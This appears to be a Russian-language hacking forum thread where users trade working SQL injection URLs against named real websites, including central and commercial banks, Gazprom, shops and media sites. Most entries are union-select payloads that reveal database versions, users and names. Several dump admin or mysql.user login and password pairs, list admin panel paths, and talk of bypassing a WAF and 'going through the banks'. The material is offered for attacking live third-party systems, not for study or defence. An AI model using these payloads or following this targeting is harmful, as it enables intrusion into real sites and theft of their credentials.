SQL Инъекции

Code:

list-a-day.com/?Gamequarium&id=-868+or 1=0+union select 1,version(),3,4,5,6--

Mysql=5

Кто сможет обойти WAF просьба отписать в ПМ

 

BANK OF LEBANON (Banque du Liban)

Code:

http://www.bdl.gov.lb/edata/subseries.asp?SIID=13+union+select+1,2,3,4,5,6,7,8+from+MSysAccessXML

 

PR - 5

user() [email protected]
version() 5.0.77-log
database() srdb01

PR - 2

user() nerdriu_grfnkmp@localhost
version() 5.0.89-community
database() nerdriu_nerdrium

 

Мониторинг обменных пунктов

http://wmrates.net/detail.php?xobmen=60+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

 

PR - 4

user() [email protected]
version() 5.0.81-log
database() db316503927

PR - 3

user() extremebodyshapi@localhost
version() 5.0.22
database() extremebodyshaping

Всё что вывел

 

Code:

http://www.smdailyjournal.com/article_preview.php?title=DA:&id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15--

4.0.25:::smdaily2:::smdaily2@localhost

Code:

http://www.bilet-da.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15--

5.0.77:::biletda_ru:::biletdaru@localhost

Code:

http://www.dilhaidesi.com/lyrics/song.php?name=Ja%20Ni%20Tera%20Pyar%20Kudey&movie=Captain%20Bhangre%20Da&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,version(),database(),user())--

5.1.33:::dilhaidesi_main:::dilhaidesi_main@localho st

Code:

http://www.biletda.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15--

5.0.77:::biletda_ru:::biletdaru@localhost

 

PR - 3

user() kandahar@localhost
version() 5.0.82sp1
database() kandahar

 

gazprom
http://www.msk-tr.gazprom.ru/news/jubilee/item.php?jubileeID=-43+union+select+1,2,3,4,group_concat(login,0x3A,password+SEPARATOR+0x0b),6,7,8,9+FROM+mtg131_main.users--

Информация для модераторов. Первый раз когда я выкладывал эту скуль. там был MySQL 4. и таблицы были несбручены. Сейчас они обновились теперь у них MySQL 5*. Вобщем вот. раскрученная скуль.

 

http://stim-parquet.ru/newspod.php?id=25&table=news_sait+where+1=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14+from+st_news_sait

 

shop

http://www.rsapc.com/projects/detail.php?id=-174+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--+++

 

[email protected]:::voiturembeep:::5.0.90-log::

Code:

http://www.mpac.org/article.php?id=-725'+union+select+1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23

Sanilulu_nigeria@localhost:::sanilulu_nff:::5.0.91-community::

Code:

http://www.nigeriaff.com/Newsdisplay.php?ID=-167+union+select+1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11

[/B]

[email protected]:::ntbkca:::5.0.51a-log::

Code:

http://www.battery-notebook.ca/info.php?pid=-5305'+union+select+1,2,3,4,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19%23

ithink@localhost:::ithinkmusic:::5.0.77::

Code:

http://dubkraftrecords.ithinkmusic.com/my-store/detail.php?r=-12039/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9%23

[/B]

 

http://www.digitalpodcast.com/detail.php?id=-19468+union+select+version(),2,3--

 

Bank of the Lao P.D.R.

Code:

http://www.bol.gov.la/english/news_report.php?nid=-42+union+select+1,concat_ws(0x3a,version(),user(),database(),cast(user as char),cast(password as char)),3,4,5,6,7,8+from+mysql.user--

p.s file_priv Y

 

Ну что, сиди- не сиди а начинать надо... Поддержим товарищей и пройдемся по банкам

Banque Atlantique

Code:

http://www.banqueatlantique.net/index.php?parcours=article&rubrique=-1+union+select+1,2,concat_ws(0x3a,admin,password),4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18+from+webuser+--+

 

PR - 3

Code:

[B]http://www.kandahar-taos.com/property-detail.php?lid=-15+union+select+1,2,group_concat(username,char(58) ,password),4,5,6,7,8+from+admin--[/B]

user() kandahar@localhost
version() 5.0.82sp1
database() kandahar

PR - 3

Code:

http://extremebodyshaping.com/locations_main.php?lid=-12+union+select+1,group_concat(UserName,char(58),U serPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+users--

user() extremebodyshapi@localhost
version() 5.0.22
database() extremebodyshaping

Code:

extremebodyshaping.com/admin

pr 4

Code:

http://www.desilassi.com/AtoZ.php?lid=-1+union+select+1,group_concat(username,char(58),pa ssword),3,4+from+administration_users--

user() [email protected]
version() 5.0.81-log
database() db316503927

Code:

desilassi.com/admin

 

продолжим банковскую тему

Banque BEMO

Code:

http://www.bemobank.com/bemo.php?id1=-12+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4+--+

 

Code:

http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28table_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_schema=0x636d323330363737+--+

Code:

http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28column_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x636c69656e7473+--+

Code:

http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%280x0b,id,0x3a,login,0x3a,pwd%29,8,9,10,11,12,13,14,15,16+from+clients+limit+0,20+--+

 

PR 1

PR 5

PR 1 ТИЦ 10

PR 3 ТИЦ 60

PR 4 ТИЦ 250

PR 3 ТИЦ 10

PR 5 ТИЦ 70

ТИЦ 10

 

Ну и я чтоле

Code:

http://www.romanchuk.com.ua/index.php?id=1001+and+1=2+union+select+1,2,3,unhex(hex(group_concat(login,0x3a,password))),5+from+admin--+

Code:

http://polvent.com/index.php?action=catalog&brand=2&id=58+and+1=2+union+select+1,2,3,group_concat(login,0x3a,password,0x0b),5,6,7,8,9,10,11,12,13+from+admin--+

Code:

http://mobilstyle.com.ua/view_news.php?id=1+and+1=2+union+select+concat_ws(0x0b,password),2,3,4,5+from+admin--+

Code:

http://nunhems.com.ua/kultury.php?id=47+and+1=2+union+select+1,2,3,4,5,6,7,8,group_concat(user,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users--+

Code:

http://inkata.lp.edu.ua/index.php?action=news&id=11+and+1=2+union+select+1,2,3,4,5,group_concat(login,0x3a,password),7,8+from+admin--+

 

ну продолжим банковскую тему )

USA Merrimack County Savings Bank

Code:

http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,version(),3,4,5--

Database Version: 4.1.22-standard
Database name: mcsbnhc_mcsb
User name: mcsbnhc_ensky@localhost
http://www.mcsbnh.com/admin/